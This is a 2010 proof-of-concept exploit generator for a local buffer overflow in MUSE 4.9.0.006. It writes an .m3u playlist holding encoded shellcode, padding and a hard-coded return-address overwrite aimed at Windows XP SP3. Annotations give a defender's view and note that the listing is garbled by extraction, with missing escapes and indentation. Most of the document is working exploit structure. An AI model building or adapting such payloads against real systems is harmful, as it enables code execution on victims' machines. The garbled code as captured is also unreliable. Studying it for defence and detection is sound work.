# Title : MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
# Published : 2010-08-16
# Author : Glafkos Charalambous
# Exploit Title: MUSE v4.9.0.006 (.m3u) Local Buffer Overflow Exploit
# Date: August 17, 2010
# Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
# Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En
# Proof-of-concept generator: builds one string and writes it to 'muse.m3u'.
# Per the header, the file targets a local buffer overflow in MUSE 4.9.0.006
# when it opens an .m3u playlist (tested by the author on Windows XP SP3 En).
#
# NOTE(review): as captured on this page the listing is not valid Python --
# the indentation under try/except is missing and the string literals look
# garbled by extraction. Read it as an analysis reference, not a runnable
# script. The print statements are Python 2 syntax.
#
# Defender's view: the title implies the player copies playlist data into a
# fixed-size buffer without a length check. The fix belongs in the
# application (bounded parsing of playlist entries); platform mitigations
# such as DEP, ASLR and stack cookies make a fixed-address overwrite like
# this one far less dependable. Playlists are plain text, so an .m3u whose
# content is a few hundred bytes of non-printable data is anomalous and
# worth flagging in mail/web gateways or endpoint scanning.

# Combined length of filler + payload blob + padding, i.e. everything that
# precedes the `eip` value in the file. Presumably the offset at which the
# saved return address is reached -- inferred from the variable names only.
buffersize = 205
# Short run of filler placed before the payload blob and again after `eip`.
nopsled = "x90" * 4
# Custom MessageBox
# x86/shikata_ga_nai succeeded with size 104 (iteration=1)
# (Author's notes: an encoded blob that, per the comment above, displays a
# message box. The bytes themselves are not analysed in this listing.)
shellcode = ("xd9xe5x29xc9xbexe0xc8xa6x9fxb1x14xd9x74x24xf4"
"x5fx83xc7x04x31x77x14x03x77xf4x2ax53xf7x8cx8a"
"xbcx08x04xacxd9x4axbbx5ax47x38x30xfaxefxd1xdb"
"xdcxa2x45x60x68x4exe2xefx71xd8x6fx8bx54x19x18"
"x36xf4x6cxacxd0x9fxaex09x58x08xc3xf2xf7xacx73"
"xa6x6fx48xe8xc1x8exa3x30x81x03x95xe0x98x49x12"
"x44xa3x72xcfx77x9bxdcx48x65xd0x5dxd4x75x36")
# Padding sized so that nopsled + shellcode + junk adds up to `buffersize`.
junk = "x90" * (buffersize-(len(nopsled)+len(shellcode)))
# Short trailing value appended at the very end; the name suggests a jump
# back into the earlier part of the buffer -- TODO confirm.
njump = "xe9x29xffxffxff"
# Hard-coded 4-byte value placed right after the 205-byte segment; the name
# indicates it is meant to land on the saved instruction pointer. A fixed
# value like this presumably depends on a module loaded at a predictable
# address on the tested OS build, so it is tied to that exact platform.
eip = "x53x93x42x7e"
# Final file layout: filler | blob | padding | eip | filler | njump
payload = nopsled+shellcode+junk+eip+nopsled+njump
# Write the assembled string to muse.m3u in the current working directory.
try:
print "[+] Creating exploit file.."
exploit = open('muse.m3u','w');
exploit.write(payload);
exploit.close();
print "[+] Writing", len(payload), "bytes to muse.m3u"
print "[+] Exploit file created!"
# Bare except: every failure is reported as a permissions problem, including
# unrelated errors, so the message can be misleading.
except:
print "[-] Error: You do not have correct permissions.."